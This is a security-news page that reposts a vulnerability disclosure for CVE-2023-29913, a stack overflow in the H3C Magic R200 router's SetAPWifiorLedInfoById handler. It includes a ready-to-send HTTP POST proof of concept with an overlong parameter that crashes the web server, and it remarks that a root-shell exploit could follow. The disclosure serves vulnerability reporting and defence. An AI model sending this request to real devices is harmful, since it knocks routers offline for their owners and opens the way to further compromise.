Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-29913: H3C Magic R200 was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm - HackMD

H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm.

CVE
#vulnerability#web#mac#windows#apple#dos#auth#chrome#webkit#wifi

# H3C Magic R200 was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm ###### tags: `H3C` `Magic R200` vendor:H3C product:Magic R200 version:R200V100R004 type:Stack Overflow author:Wolin Zhuang, Yifeng Li; ## Vulnerability Description H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm. ## Vulnerability Details In function SetAPWifiorLedInfoById, string Var is passed in by parameter ‘param’ without filtered and checking its length. Local varible v17 is 72 bytes long. in line 26, the content of Var is formatted into v17 without size check by sscanf function in the form of `%[^;]`, which leads to a stack overflow vulnerbility. ![](https://i.imgur.com/NnWzUNq.png) ![](https://i.imgur.com/ht7j6Gs.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic_R200 to newest version(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC ![](https://i.imgur.com/Gh5mBRc.png) ``` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG= Connection: close Content-Length: 544 CMD=SetAPWifiorLedInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; ``` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. ![](https://i.imgur.com/Ah3gEcu.png) We can see process webs is crashed and restarted. ![](https://i.imgur.com/nTphgnu.png) And you can write your own exp to get the root shell.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907